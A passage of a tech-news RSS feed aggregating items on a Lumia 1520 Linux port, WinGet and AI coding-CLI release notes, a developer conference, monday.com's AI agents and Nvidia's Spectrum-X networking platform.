<content:encoded><![CDATA[<div><img width="780" height="440" src="https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-1440x812.jpg" class="attachment-large size-large wp-post-image" alt="Photo of a person using DashResume ATF-friendly resume maker on a laptop at a cafe" decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-1440x812.jpg 1440w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-400x226.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-1536x866.jpg 1536w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-768x433.jpg 768w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534-1020x575.jpg 1020w, https://www.cultofmac.com/wp-content/uploads/2026/06/DashResume-e1784757675534.jpg 1560w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>DashResume helps you build ATS-friendly resumes, optimize applications for specific jobs and create unlimited cover letters.</p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[bringing mainline Linux to the Nokia Lumia 1520]]></title>
<description><![CDATA[Hey everyone, I’ve been working on getting a modern mainline Linux stack running on the Nokia Lumia 1520, a 2013 Windows Phone built around Qualcomm’s MSM8974 platform. This isnt an Android ROM port or a Windows Phone mod. The goal is to bring the device up on a current Linux kernel with postmark...]]></description>
<link>https://tsecurity.de/de/3687880/linux-tipps/bringing-mainline-linux-to-the-nokia-lumia-1520/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687880/linux-tipps/bringing-mainline-linux-to-the-nokia-lumia-1520/</guid>
<pubDate>Thu, 23 Jul 2026 04:29:03 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey everyone,</p> <p>I’ve been working on getting a modern mainline Linux stack running on the Nokia Lumia 1520, a 2013 Windows Phone built around Qualcomm’s MSM8974 platform.</p> <p>This isnt an Android ROM port or a Windows Phone mod. The goal is to bring the device up on a current Linux kernel with postmarketOS and gradually implement the missing hardware support needed to make it usable.</p> <p>So far, I’ve managed to:</p> <ul> <li>Build a custom bootloader and device-tree configuration</li> <li>Create a postmarketOS device package for the RM-940</li> <li>Boot a Linux 6.16-based kernel</li> <li>Bring up USB networking</li> <li>Establish a stable SSH connection to the phone</li> <li>Run an Alpine Linux/postmarketOS userspace</li> <li>Begin implementing device-specific power and hardware support</li> </ul> <p>The SSH milestone was a major step because I can now properly inspect the running system, collect logs, test kernel changes, and continue development without relying only on framebuffer output or early boot behavior.</p> <p>The current challenge is power management.</p> <p>Full system suspend currently powers down the USB high-speed PHY, but the PHY fails to initialize again when the device resumes. Because USB networking is also the main development connection, this effectively cuts off access to the phone.</p> <p>For now, I’m treating display blanking and panel power management as a separate, more achievable target while I continue investigating the suspend/resume issue.</p> <p>There is still a lot missing, and I would not call it a usable daily-driver port yet, but the Lumia 1520 is now booting a modern Linux kernel and running a real userspace more than a decade after the hardware was released. I just wanted to share the work....</p> <p>The work is public here:</p> <p><a href="https://github.com/KorelisLabs/lumia-1520-mainline">https://github.com/KorelisLabs/lumia-1520-mainline</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DestinyInDepth"> /u/DestinyInDepth </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v3s3p3/bringing_mainline_linux_to_the_nokia_lumia_1520/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v3s3p3/bringing_mainline_linux_to_the_nokia_lumia_1520/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.30.70-preview]]></title>
<description><![CDATA[This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by filing an issue.
New in v1.30
Nothing yet.
Bug Fixes

Fixe...]]></description>
<link>https://tsecurity.de/de/3687716/downloads/windows-package-manager-13070-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687716/downloads/windows-package-manager-13070-preview/</guid>
<pubDate>Thu, 23 Jul 2026 00:42:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.30</h2>
<p>Nothing yet.</p>
<h2>Bug Fixes</h2>
<ul>
<li>Fixed a crash (<code>0x8000ffff</code>) when using <code>--disable-interactivity</code> with the Resume experimental feature enabled during install operations.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565579611" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6262" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6262/hovercard" href="https://github.com/microsoft/winget-cli/pull/6262">#6262</a></li>
<li>Remove old Store certs, replace test use with generated ones by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626150885" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6275" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6275/hovercard" href="https://github.com/microsoft/winget-cli/pull/6275">#6275</a></li>
<li>Add .gitattributes and normalize line endings across repo by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianon-sso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianon-sso">@tianon-sso</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4600082935" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6267" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6267/hovercard" href="https://github.com/microsoft/winget-cli/pull/6267">#6267</a></li>
<li>Renormalize by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4633514887" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6276" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6276/hovercard" href="https://github.com/microsoft/winget-cli/pull/6276">#6276</a></li>
<li>Change event type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615424908" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6273" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6273/hovercard" href="https://github.com/microsoft/winget-cli/pull/6273">#6273</a></li>
<li>Update minor version, archive release notes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642943454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6279" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6279/hovercard" href="https://github.com/microsoft/winget-cli/pull/6279">#6279</a></li>
<li>Align .gitattributes and .editorconfig by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668279620" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6285" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6285/hovercard" href="https://github.com/microsoft/winget-cli/pull/6285">#6285</a></li>
<li>Doc manifest schema process by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643557474" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6280" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6280/hovercard" href="https://github.com/microsoft/winget-cli/pull/6280">#6280</a></li>
<li>Fix crash with --disable-interactivity and EFResume by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4703166998" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6302" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6302/hovercard" href="https://github.com/microsoft/winget-cli/pull/6302">#6302</a></li>
<li>Fix configuration elevation validation for standard flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4708403993" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6307" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6307/hovercard" href="https://github.com/microsoft/winget-cli/pull/6307">#6307</a></li>
<li>Bump markdown-it from 14.1.1 to 14.2.0 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4686342275" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6296" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6296/hovercard" href="https://github.com/microsoft/winget-cli/pull/6296">#6296</a></li>
<li>Bump undici from 7.25.0 to 7.28.0 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4705714856" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6305" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6305/hovercard" href="https://github.com/microsoft/winget-cli/pull/6305">#6305</a></li>
<li>Bump form-data from 4.0.5 to 4.0.6 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710948701" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6311" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6311/hovercard" href="https://github.com/microsoft/winget-cli/pull/6311">#6311</a></li>
<li>Clean vcpkg artifacts on solution clean by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754061053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6339" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6339/hovercard" href="https://github.com/microsoft/winget-cli/pull/6339">#6339</a></li>
<li>Fix punctuation in error messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/idleberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/idleberg">@idleberg</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715127350" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6314" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6314/hovercard" href="https://github.com/microsoft/winget-cli/pull/6314">#6314</a></li>
<li>Fix cpprest checked iterator build error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4703039819" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6301" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6301/hovercard" href="https://github.com/microsoft/winget-cli/pull/6301">#6301</a></li>
<li>Undo normalization of external files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753826668" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6336" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6336/hovercard" href="https://github.com/microsoft/winget-cli/pull/6336">#6336</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianon-sso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianon-sso">@tianon-sso</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4600082935" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6267" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6267/hovercard" href="https://github.com/microsoft/winget-cli/pull/6267">#6267</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/idleberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/idleberg">@idleberg</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715127350" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6314" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6314/hovercard" href="https://github.com/microsoft/winget-cli/pull/6314">#6314</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.29.240...v1.30.70-preview"><tt>v1.29.240...v1.30.70-preview</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.218]]></title>
<description><![CDATA[What's changed

Changed /code-review to run as a background subagent, so review work no longer fills your conversation and keeps stacked slash commands as its review target
Added screen-reader announcements of deleted text for word and line deletions (Option+Delete, Ctrl+W, Cmd+Backspace, Ctrl+U,...]]></description>
<link>https://tsecurity.de/de/3687638/downloads/v21218/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687638/downloads/v21218/</guid>
<pubDate>Wed, 22 Jul 2026 23:32:59 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Changed <code>/code-review</code> to run as a background subagent, so review work no longer fills your conversation and keeps stacked slash commands as its review target</li>
<li>Added screen-reader announcements of deleted text for word and line deletions (<code>Option+Delete</code>, <code>Ctrl+W</code>, <code>Cmd+Backspace</code>, <code>Ctrl+U</code>, <code>Ctrl+K</code>) in <code>--ax-screen-reader</code> mode</li>
<li>Fixed Windows paths with <code>\u</code>-prefixed segments (like <code>C:\Users\unicorn</code>) being corrupted into CJK characters in tool inputs, which made those files inaccessible</li>
<li>Fixed the left arrow key discarding the conversation with no undo: presses right after editing now ask to confirm, and Esc in the agent view returns to the conversation it backgrounded</li>
<li>Added HTTP status and error text to <code>claude mcp list</code> and <code>/mcp</code> when a server fails to connect, and a warning for MCP config values with hidden leading or trailing whitespace</li>
<li>Fixed multi-line paste collapsing into one line with <code>j</code> in place of newlines in terminals that encode pasted newlines as Ctrl+J</li>
<li>Fixed <code>/context</code> reporting stale pre-compact token usage after compacting from the message picker</li>
<li>Fixed <code>/ultrareview</code> failing on descriptive arguments like "review my auth changes" — they now run a review of your current branch with the text applied as a note to the findings</li>
<li>Fixed <code>/code-review ultra</code> silently running a local review in non-interactive sessions — it now launches the cloud review</li>
<li>Fixed gateway spend metering to price Bedrock application-inference-profile ARNs and other config-mapped upstream model IDs at the configured model's rates</li>
<li>Fixed mojibake when a long IDE selection was truncated mid-emoji, and a case where a tool executor error could be silently dropped</li>
<li>Fixed an engine teardown race that could start and abandon a phantom turn, and made input pushed after close consistently rejected</li>
<li>Fixed spurious "[Request interrupted by user]" messages after interrupted tool calls, and an unpaired <code>tool_use</code> block left in the transcript when a tool aborted mid-response</li>
<li>Fixed VoiceOver reading "new line" instead of echoing the typed space at the end of the input in <code>--ax-screen-reader</code> mode</li>
<li>Fixed plugin and settings panels not moving the terminal cursor to the focused row, so screen readers and magnifiers can follow arrow-key navigation</li>
<li>Fixed crashes (maximum call stack exceeded) when a deeply nested watched directory tree was deleted or moved, and when rendering deeply nested UI trees</li>
<li>Fixed pull request events occasionally being lost when a session exited immediately after creating or linking a PR</li>
<li>Fixed the Bedrock setup wizard failing profile verification for assume-role profiles in partitioned AWS regions and on proxy-only networks</li>
<li>Fixed rare negative or incorrect turn duration measurements after a system clock adjustment by timing turns with a monotonic clock</li>
<li>Fixed the "N MCP servers need authentication" startup notice over-counting claude.ai connectors that aren't connected in claude.ai</li>
<li>Fixed prompt history entries being dropped or duplicated when history writes raced or failed</li>
<li>Fixed a retry loop that re-sent identical doomed requests after a context-overflow error with a large thinking budget; <code>Ctrl+B</code> backgrounding now applies the same background-shell caps as other paths</li>
<li>Fixed agent frontmatter hooks running from untrusted folders: hooks now require the agent file's own folder to have accepted workspace trust</li>
<li>Fixed fork-session lineage being lost after compaction in headless and SDK sessions</li>
<li>Fixed a resumed session failing every turn, or crashing on resume, when its history held a malformed delta attachment</li>
<li>Improved <code>/ultrareview</code> error feedback so Claude can correct an invalid argument instead of retrying it unchanged</li>
<li>Improved auto mode: the dangerous-rm, background-<code>&amp;</code>, and suspicious-Windows-path checks no longer open permission dialogs; the auto-mode classifier adjudicates them instead</li>
<li>Improved sandbox command restrictions for IDE interactions</li>
<li>Improved trust dialogs to name the repository root the grant covers</li>
<li>Changed <code>/deep-research</code> to start only when invoked manually; Claude no longer launches it on its own</li>
<li>Changed plan mode with auto to no longer prompt for Bash commands the static analyzer can't prove read-only; the auto-mode classifier judges them instead</li>
<li>Added an announcement when fast mode changes as a result of switching models via <code>/config model=&lt;x&gt;</code> or Remote Control</li>
<li>Changed server-managed settings so benign feature and cost toggles no longer trigger the settings-approval prompt</li>
<li>Changed agent markdown files to reject agent names containing <code>:</code>, which is reserved for plugin namespacing</li>
<li>Changed skills with <code>context: fork</code> to run in the background by default; opt out per skill with <code>background: false</code></li>
<li>Added <code>yes</code>/<code>no</code>/<code>on</code>/<code>off</code>/<code>1</code>/<code>0</code> (case-insensitive) as accepted values for skill and plugin frontmatter booleans, alongside <code>true</code>/<code>false</code></li>
<li>Fixed remote sessions continuing to send heartbeats after their worker was replaced, which left long-lived desktop and IDE processes retrying a rejected request every few seconds forever</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[WeAreDevelopers World Congress North America 2026 – Discount for Top Event from Sept. 23-25 in San José]]></title>
<description><![CDATA[From September 23th to 25th the WeAreDevelopers World Congress North America 2026 takes place in San José, California, USA. This mega-event for Developers, AI Builders, and Tech Leaders—featuring exciting Topics related to Software Development in the AI era—is expected to draw around 10,000 atten...]]></description>
<link>https://tsecurity.de/de/3687223/it-nachrichten/wearedevelopers-world-congress-north-america-2026-discount-for-top-event-from-sept-23-25-in-san-jos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687223/it-nachrichten/wearedevelopers-world-congress-north-america-2026-discount-for-top-event-from-sept-23-25-in-san-jos/</guid>
<pubDate>Wed, 22 Jul 2026 20:12:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From September 23th to 25th the WeAreDevelopers World Congress North America 2026 takes place in San José, California, USA. This mega-event for Developers, AI Builders, and Tech Leaders—featuring exciting Topics related to Software Development in the AI era—is expected to draw around 10,000 attendees and 500 speakers. Use the Discount Code OH_10 to get 10% off the most … <a href="https://innovative-trends.de/2026/07/22/wearedevelopers-world-congress-north-america-2026-discount-for-top-event-from-sept-23-25-in-san-jose/" class="more-link"><span class="screen-reader-text">WeAreDevelopers World Congress North America 2026 – Discount for Top Event from Sept. 23-25 in San José</span> weiterlesen</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Overengineering Your Agent Harness]]></title>
<description><![CDATA[The following originally appeared on Hugo Bowne-Anderson’s Vanishing Gradients Substack and is being republished here with the author’s permission. The conversation around harness engineering is dominated by problems from coding and personal agents such as OpenClaw, but most agents are simpler. B...]]></description>
<link>https://tsecurity.de/de/3686996/ai-nachrichten/stop-overengineering-your-agent-harness/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686996/ai-nachrichten/stop-overengineering-your-agent-harness/</guid>
<pubDate>Wed, 22 Jul 2026 18:22:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The following originally appeared on Hugo Bowne-Anderson’s Vanishing Gradients Substack and is being republished here with the author’s permission. The conversation around harness engineering is dominated by problems from coding and personal agents such as OpenClaw, but most agents are simpler. Builders should avoid over-engineering for capabilities that newer models may absorb anyway, the “Kirby […]]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Teammates: how monday.com runs production AI agents on Amazon Bedrock]]></title>
<description><![CDATA[AI Teammates are agentic AI on Amazon Bedrock, and few engineering organizations run them in production at the scale that monday.com does. Nine in ten Builders use AI coding tools every month, up from roughly half a year ago. Per-engineer PR throughput is up by more than half. Every figure in thi...]]></description>
<link>https://tsecurity.de/de/3686974/ai-nachrichten/ai-teammates-how-mondaycom-runs-production-ai-agents-on-amazon-bedrock/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686974/ai-nachrichten/ai-teammates-how-mondaycom-runs-production-ai-agents-on-amazon-bedrock/</guid>
<pubDate>Wed, 22 Jul 2026 18:13:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI Teammates are agentic AI on Amazon Bedrock, and few engineering organizations run them in production at the scale that monday.com does. Nine in ten Builders use AI coding tools every month, up from roughly half a year ago. Per-engineer PR throughput is up by more than half. Every figure in this post comes from monday’s own internal production data. In this post, we share the architecture behind those numbers, the retrofits that made it work in a decade-old code base, and the confidence-scored merge play closing the gap to full autonomy.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia unveils Spectrum-X networking platform designed to connect millions of GPUs]]></title>
<description><![CDATA[Nvidia has introduced its next-generation Spectrum-X Ethernet networking platform, positioning it as a key building block for the next wave of “gigascale” AI factories designed to connect millions of GPUs while reducing power consumption and operational costs.



The networking platform is part o...]]></description>
<link>https://tsecurity.de/de/3686898/it-security-nachrichten/nvidia-unveils-spectrum-x-networking-platform-designed-to-connect-millions-of-gpus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686898/it-security-nachrichten/nvidia-unveils-spectrum-x-networking-platform-designed-to-connect-millions-of-gpus/</guid>
<pubDate>Wed, 22 Jul 2026 17:45:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/3562856">Nvidia</a> has introduced its next-generation Spectrum-X Ethernet networking platform, positioning it as a key building block for the next wave of “gigascale” <a href="https://www.networkworld.com/article/4080459/nvidia-looks-to-power-ai-factory-networks.html">AI factories</a> designed to connect millions of GPUs while reducing power consumption and <a href="https://blogs.nvidia.com/blog/performance-per-watt-ai-infrastructure-efficiency/">operational</a> costs.</p>



<p class="wp-block-paragraph">The networking platform is part of Nvidia’s broader <a href="https://www.networkworld.com/article/4146173/nvidia-announces-vera-rubin-platform-signaling-a-shift-to-full-stack-ai-infrastructure.html">Rubin architecture</a>, which integrates six major components—including the Vera CPU, Rubin GPU, NVLink 6 switches, ConnectX-9 SuperNICs, BlueField-4 DPUs and the new Spectrum-6 Ethernet switches—into a tightly coupled AI infrastructure stack.</p>



<p class="wp-block-paragraph">The company says this level of integration underscores the growing importance of <a href="https://www.networkworld.com/article/4050881/nvidia-networking-roadmap-ethernet-infiniband-co-packaged-optics-will-shape-data-center-of-the-future.html">networking in AI</a>. In its most recent quarter, <a href="https://finance.yahoo.com/news/nvidia-ceo-were-now-the-largest-networking-company-in-the-world-184004945.html">networking sales were $11 billion</a>, up 263% year-over-year, prompting the ever-subtle CEO Jensen Huang to declare “We’re … now the largest networking company in the world” during Nvidia’s earnings call.</p>



<p class="wp-block-paragraph">While GPUs have dominated headlines during the AI boom, networking has increasingly become a performance bottleneck as models grow larger and require faster communication between compute nodes.</p>



<p class="wp-block-paragraph"><a href="https://blogs.nvidia.com/blog/nvidia-spectrum-six-arrives-in-gigascale-ai-factories/">Spectrum-X is a comprehensive</a> platform consisting of Spectrum Ethernet switches, Spectrum-X SuperNICs, ConnectX NICs, BlueField DPUs, LinkX cabling and transceivers and Spectrum-XGS for networking between multiple AI data centers.</p>



<p class="wp-block-paragraph">At the heart of the platform is the Spectrum-6 switch, a 102.4-terabit-per-second Ethernet switch system delivering 2x the capacity of previous-generation systems and built as part of the Vera Rubin platform. </p>



<p class="wp-block-paragraph">Spectrum-6 is designed to operate an AI factory as one end-to-end computing system. It combines new Ethernet switches, network interface cards, silicon photonics and software designed to improve bandwidth while lowering latency and power usage.</p>



<p class="wp-block-paragraph">The new Spectrum-X technology intelligently balances traffic across available paths, rapidly bypasses failures and precisely recovers when data traveling across a network fails to reach its destination. Plus, support for open network operating systems and a choice of RDMA transport models gives AI builders flexibility without compromising performance.</p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/technology/article/nvidia-touts-vera-rubin-performance-ahead-of-rival-amds-advancing-ai-event-150000768.html?guccounter=1&amp;guce_referrer=aHR0cHM6Ly9uZXdzLmdvb2dsZS5jb20v&amp;guce_referrer_sig=AQAAAEh_I8qKgLgYmKxTlsV8p1hghe0mcbZfOSUjeFuuNz_mo3S2J-hp5qMxJkhFymSrtqeE6GKacJ0zIOKu7RWJcmqF6_A3ngsbW4jA5OUigdf1JbplRZJki10-au5CQNVt1hdI-OlkZtXKlTqfpWGF9v0XHEKZq39-omo3uCA1N2jk">Nvidia</a> says its latest silicon photonics technology integrates optical communications directly into networking hardware, reducing power consumption while increasing bandwidth density compared with conventional optical networking approaches.</p>



<p class="wp-block-paragraph">The announcement reflects a broader shift in AI infrastructure strategy. Early AI clusters were primarily limited by GPU availability, but hyperscale operators are increasingly finding that networking, storage and power delivery determine how efficiently massive GPU deployments perform. By integrating networking more tightly with compute, Nvidia aims to eliminate communication bottlenecks that emerge as AI systems scale beyond a single data center or even multiple campuses.</p>



<p class="wp-block-paragraph">New to the platform is Nvidia’s previously announced Spectrum-XGS technology, which links geographically distributed data centers into a single AI supercomputer. Together, the technologies are designed to enable organizations to construct AI factories that span multiple facilities while operating as a unified computing environment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4688: Downloading Podcasts with a Shell Script]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.






01 Introduction






In this episode I will describe techniques for downloading podcasts using basic shell commands such as wget. 


I will illustrate this using a bash script that can be used to download HPR podcasts.


Even if you d...]]></description>
<link>https://tsecurity.de/de/3685037/podcasts/hpr4688-downloading-podcasts-with-a-shell-script/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685037/podcasts/hpr4688-downloading-podcasts-with-a-shell-script/</guid>
<pubDate>Wed, 22 Jul 2026 02:06:46 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
